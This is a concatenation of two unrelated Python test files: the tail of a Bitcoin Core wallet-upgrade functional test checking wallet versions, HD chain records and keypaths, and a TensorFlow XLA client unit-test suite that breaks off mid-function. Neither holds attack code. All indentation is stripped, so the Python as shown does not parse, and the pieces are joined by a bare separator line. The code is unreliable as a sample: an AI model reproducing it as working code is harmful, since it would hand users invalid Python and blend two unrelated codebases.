self.log.info("Intermediary versions don't effect anything")
copy_non_hd()
# Wallet starts with 60000
assert_equal(60000, wallet.getwalletinfo()['walletversion'])
wallet.unloadwallet()
before_checksum = sha256sum_file(node_master_wallet)
node_master.loadwallet('')
# Test an "upgrade" from 60000 to 129999 has no effect, as the next version is 130000
self.test_upgradewallet(wallet, previous_version=60000, requested_version=129999, expected_version=60000)
wallet.unloadwallet()
assert_equal(before_checksum, sha256sum_file(node_master_wallet))
node_master.loadwallet('')
self.log.info('Wallets cannot be downgraded')
copy_non_hd()
self.test_upgradewallet_error(wallet, previous_version=60000, requested_version=40000,
msg="Cannot downgrade wallet from version 60000 to version 40000. Wallet version unchanged.")
wallet.unloadwallet()
assert_equal(before_checksum, sha256sum_file(node_master_wallet))
node_master.loadwallet('')
self.log.info('Can upgrade to HD')
# Inspect the old wallet and make sure there is no hdchain
orig_kvs = dump_bdb_kv(node_master_wallet)
assert b'\x07hdchain' not in orig_kvs
# Upgrade to HD, no split
self.test_upgradewallet(wallet, previous_version=60000, requested_version=130000)
# Check that there is now a hd chain and it is version 1, no internal chain counter
new_kvs = dump_bdb_kv(node_master_wallet)
assert b'\x07hdchain' in new_kvs
hd_chain = new_kvs[b'\x07hdchain']
assert_equal(28, len(hd_chain))
hd_chain_version, external_counter, seed_id = struct.unpack('<iI20s', hd_chain)
assert_equal(1, hd_chain_version)
seed_id = bytearray(seed_id)
seed_id.reverse()
old_kvs = new_kvs
# First 2 keys should still be non-HD
for i in range(0, 2):
info = wallet.getaddressinfo(wallet.getnewaddress())
assert 'hdkeypath' not in info
assert 'hdseedid' not in info
# Next key should be HD
info = wallet.getaddressinfo(wallet.getnewaddress())
assert_equal(seed_id.hex(), info['hdseedid'])
assert_equal('m/0\'/0\'/0\'', info['hdkeypath'])
prev_seed_id = info['hdseedid']
# Change key should be the same keypool
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert_equal(prev_seed_id, info['hdseedid'])
assert_equal('m/0\'/0\'/1\'', info['hdkeypath'])
self.log.info('Cannot upgrade to HD Split, needs Pre Split Keypool')
for version in [139900, 159900, 169899]:
self.test_upgradewallet_error(wallet, previous_version=130000, requested_version=version,
msg="Cannot upgrade a non HD split wallet from version {} to version {} without upgrading to "
"support pre-split keypool. Please use version 169900 or no version specified.".format(130000, version))
self.log.info('Upgrade HD to HD chain split')
self.test_upgradewallet(wallet, previous_version=130000, requested_version=169900)
# Check that the hdchain updated correctly
new_kvs = dump_bdb_kv(node_master_wallet)
hd_chain = new_kvs[b'\x07hdchain']
assert_equal(32, len(hd_chain))
hd_chain_version, external_counter, seed_id, internal_counter = struct.unpack('<iI20sI', hd_chain)
assert_equal(2, hd_chain_version)
assert_equal(0, internal_counter)
seed_id = bytearray(seed_id)
seed_id.reverse()
assert_equal(seed_id.hex(), prev_seed_id)
# Next change address is the same keypool
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert_equal(prev_seed_id, info['hdseedid'])
assert_equal('m/0\'/0\'/2\'', info['hdkeypath'])
# Next change address is the new keypool
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert_equal(prev_seed_id, info['hdseedid'])
assert_equal('m/0\'/1\'/0\'', info['hdkeypath'])
# External addresses use the same keypool
info = wallet.getaddressinfo(wallet.getnewaddress())
assert_equal(prev_seed_id, info['hdseedid'])
assert_equal('m/0\'/0\'/3\'', info['hdkeypath'])
self.log.info('Upgrade non-HD to HD chain split')
copy_non_hd()
self.test_upgradewallet(wallet, previous_version=60000, requested_version=169900)
# Check that the hdchain updated correctly
new_kvs = dump_bdb_kv(node_master_wallet)
hd_chain = new_kvs[b'\x07hdchain']
assert_equal(32, len(hd_chain))
hd_chain_version, external_counter, seed_id, internal_counter = struct.unpack('<iI20sI', hd_chain)
assert_equal(2, hd_chain_version)
assert_equal(2, internal_counter)
# Drain the keypool by fetching one external key and one change key. Should still be the same keypool
info = wallet.getaddressinfo(wallet.getnewaddress())
assert 'hdseedid' not in info
assert 'hdkeypath' not in info
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert 'hdseedid' not in info
assert 'hdkeypath' not in info
# The next addresses are HD and should be on different HD chains
info = wallet.getaddressinfo(wallet.getnewaddress())
ext_id = info['hdseedid']
assert_equal('m/0\'/0\'/0\'', info['hdkeypath'])
info = wallet.getaddressinfo(wallet.getrawchangeaddress())
assert_equal(ext_id, info['hdseedid'])
assert_equal('m/0\'/1\'/0\'', info['hdkeypath'])
self.log.info('KeyMetadata should upgrade when loading into master')
copy_v16()
old_kvs = dump_bdb_kv(v16_3_wallet)
new_kvs = dump_bdb_kv(node_master_wallet)
for k, old_v in old_kvs.items():
if k.startswith(b'\x07keymeta'):
new_ver, new_create_time, new_kp_str, new_seed_id, new_fpr, new_path_len, new_path, new_has_key_orig = deser_keymeta(BytesIO(new_kvs[k]))
old_ver, old_create_time, old_kp_str, old_seed_id, old_fpr, old_path_len, old_path, old_has_key_orig = deser_keymeta(BytesIO(old_v))
assert_equal(10, old_ver)
if old_kp_str == b"": # imported things that don't have keymeta (i.e. imported coinbase privkeys) won't be upgraded
assert_equal(new_kvs[k], old_v)
continue
assert_equal(12, new_ver)
assert_equal(new_create_time, old_create_time)
assert_equal(new_kp_str, old_kp_str)
assert_equal(new_seed_id, old_seed_id)
assert_equal(0, old_path_len)
assert_equal(new_path_len, len(new_path))
assert_equal([], old_path)
assert_equal(False, old_has_key_orig)
assert_equal(True, new_has_key_orig)
# Check that the path is right
built_path = []
for s in new_kp_str.decode().split('/')[1:]:
h = 0
if s[-1] == '\'':
s = s[:-1]
h = 0x80000000
p = int(s) | h
built_path.append(p)
assert_equal(new_path, built_path)
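# (For example, a keypath string of m/0'/1 parses to [0x80000000, 1]:
# a trailing apostrophe marks a hardened index, which sets the top bit.)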
self.log.info('Upgrading to NO_DEFAULT_KEY should not remove the defaultkey')
copy_split_hd()
# Check the wallet has a default key initially
old_kvs = dump_bdb_kv(node_master_wallet)
defaultkey = old_kvs[b'\x0adefaultkey']
self.log.info("Upgrade the wallet. Should still have the same default key.")
self.test_upgradewallet(wallet, previous_version=139900, requested_version=159900)
new_kvs = dump_bdb_kv(node_master_wallet)
up_defaultkey = new_kvs[b'\x0adefaultkey']
assert_equal(defaultkey, up_defaultkey)
# 0.16.3 doesn't have a default key
v16_3_kvs = dump_bdb_kv(v16_3_wallet)
assert b'\x0adefaultkey' not in v16_3_kvs
if self.is_sqlite_compiled():
self.log.info("Checking that descriptor wallets do nothing, successfully")
self.nodes[0].createwallet(wallet_name="desc_upgrade", descriptors=True)
desc_wallet = self.nodes[0].get_wallet_rpc("desc_upgrade")
self.test_upgradewallet(desc_wallet, previous_version=169900, expected_version=169900)
if __name__ == '__main__':
UpgradeWalletTest().main()
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
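# (For instance, np.testing.assert_allclose(4, [[4]]) would pass via
# broadcasting; the explicit shape assertion above rejects that case.)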
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
self.assertEqual(len(proto.computations), 1)
self.assertEqual(len(proto.computations[0].instructions), 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_cpu_custom_call_target(name, fn)
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(np.float32, (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.float32, (), ()),
xla_client.Shape.array_shape(np.float32, (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As few additional ops as possible are added around the op
being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
